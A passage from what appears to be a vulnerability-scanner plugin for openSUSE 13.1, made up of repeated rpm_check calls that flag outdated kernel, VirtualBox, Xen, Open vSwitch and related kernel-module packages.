reference:\"cloop-kmp-desktop-debuginfo-2.639_k3.12.59_47-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-pae-2.639_k3.12.59_47-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-pae-debuginfo-2.639_k3.12.59_47-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-xen-2.639_k3.12.59_47-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-xen-debuginfo-2.639_k3.12.59_47-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-7.0.2-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-debuginfo-7.0.2-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-debugsource-7.0.2-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-devel-7.0.2-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-eppic-7.0.2-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-eppic-debuginfo-7.0.2-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-gcore-7.0.2-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-gcore-debuginfo-7.0.2-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-default-7.0.2_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-default-debuginfo-7.0.2_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-desktop-7.0.2_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-desktop-debuginfo-7.0.2_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-pae-7.0.2_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-pae-debuginfo-7.0.2_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-xen-7.0.2_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-xen-debuginfo-7.0.2_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-debugsource-1.28-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-default-1.28_k3.12.59_47-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-default-debuginfo-1.28_k3.12.59_47-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-desktop-1.28_k3.12.59_47-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-desktop-debuginfo-1.28_k3.12.59_47-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-pae-1.28_k3.12.59_47-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-pae-debuginfo-1.28_k3.12.59_47-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-xen-1.28_k3.12.59_47-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-xen-debuginfo-1.28_k3.12.59_47-16.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-6.21.1-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-debuginfo-6.21.1-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-debugsource-6.21.1-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-devel-6.21.1-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-default-6.21.1_k3.12.59_47-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-default-debuginfo-6.21.1_k3.12.59_47-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-desktop-6.21.1_k3.12.59_47-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-desktop-debuginfo-6.21.1_k3.12.59_47-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-pae-6.21.1_k3.12.59_47-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-pae-debuginfo-6.21.1_k3.12.59_47-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-xen-6.21.1_k3.12.59_47-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-xen-debuginfo-6.21.1_k3.12.59_47-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-1.4.20.3-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-debuginfo-1.4.20.3-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-debugsource-1.4.20.3-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-default-1.4.20.3_k3.12.59_47-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-default-debuginfo-1.4.20.3_k3.12.59_47-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-desktop-1.4.20.3_k3.12.59_47-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-desktop-debuginfo-1.4.20.3_k3.12.59_47-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-pae-1.4.20.3_k3.12.59_47-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-pae-debuginfo-1.4.20.3_k3.12.59_47-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-xen-1.4.20.3_k3.12.59_47-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-xen-debuginfo-1.4.20.3_k3.12.59_47-13.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-macros-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-vanilla-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-syms-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libipset3-6.21.1-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libipset3-debuginfo-6.21.1-2.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-1.58-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-debuginfo-1.58-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-debugsource-1.58-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-default-1.58_k3.12.59_47-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-default-debuginfo-1.58_k3.12.59_47-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-desktop-1.58_k3.12.59_47-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-desktop-debuginfo-1.58_k3.12.59_47-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-pae-1.58_k3.12.59_47-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-pae-debuginfo-1.58_k3.12.59_47-31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-controller-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-controller-debuginfo-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-debuginfo-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-debugsource-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-default-1.11.0_k3.12.59_47-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-default-debuginfo-1.11.0_k3.12.59_47-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-desktop-1.11.0_k3.12.59_47-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-desktop-debuginfo-1.11.0_k3.12.59_47-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-pae-1.11.0_k3.12.59_47-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-pae-debuginfo-1.11.0_k3.12.59_47-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-xen-1.11.0_k3.12.59_47-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-kmp-xen-debuginfo-1.11.0_k3.12.59_47-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-pki-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-switch-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-switch-debuginfo-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openvswitch-test-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-0.44-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-debuginfo-0.44-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-debugsource-0.44-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-default-0.44_k3.12.59_47-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-default-debuginfo-0.44_k3.12.59_47-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-desktop-0.44_k3.12.59_47-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-desktop-debuginfo-0.44_k3.12.59_47-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-pae-0.44_k3.12.59_47-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-pae-debuginfo-0.44_k3.12.59_47-258.31.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-openvswitch-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-openvswitch-test-1.11.0-0.37.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-virtualbox-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-virtualbox-debuginfo-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-debugsource-20130607-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-default-20130607_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-default-debuginfo-20130607_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-desktop-20130607_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-desktop-debuginfo-20130607_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-pae-20130607_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-pae-debuginfo-20130607_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-xen-20130607_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-xen-debuginfo-20130607_k3.12.59_47-2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-debuginfo-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-debugsource-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-devel-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-default-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-default-debuginfo-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-desktop-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-desktop-debuginfo-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-pae-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-pae-debuginfo-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-tools-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-tools-debuginfo-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-x11-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-x11-debuginfo-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-default-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-default-debuginfo-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-desktop-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-desktop-debuginfo-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-pae-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-pae-debuginfo-4.2.36_k3.12.59_47-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-source-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-qt-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-qt-debuginfo-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-websrv-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-websrv-debuginfo-4.2.36-2.62.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-debugsource-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-devel-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-default-4.3.4_10_k3.12.59_47-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-default-debuginfo-4.3.4_10_k3.12.59_47-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-desktop-4.3.4_10_k3.12.59_47-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-desktop-debuginfo-4.3.4_10_k3.12.59_47-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-pae-4.3.4_10_k3.12.59_47-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-pae-debuginfo-4.3.4_10_k3.12.59_47-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-libs-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-libs-debuginfo-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-tools-domU-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-tools-domU-debuginfo-4.3.4_10-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-2.3-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-debuginfo-2.3-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-debugsource-2.3-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-default-2.3_k3.12.59_47-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-default-debuginfo-2.3_k3.12.59_47-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-desktop-2.3_k3.12.59_47-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-desktop-debuginfo-2.3_k3.12.59_47-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-pae-2.3_k3.12.59_47-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-pae-debuginfo-2.3_k3.12.59_47-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-xen-2.3_k3.12.59_47-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-xen-debuginfo-2.3_k3.12.59_47-2.29.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.12.59-47.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 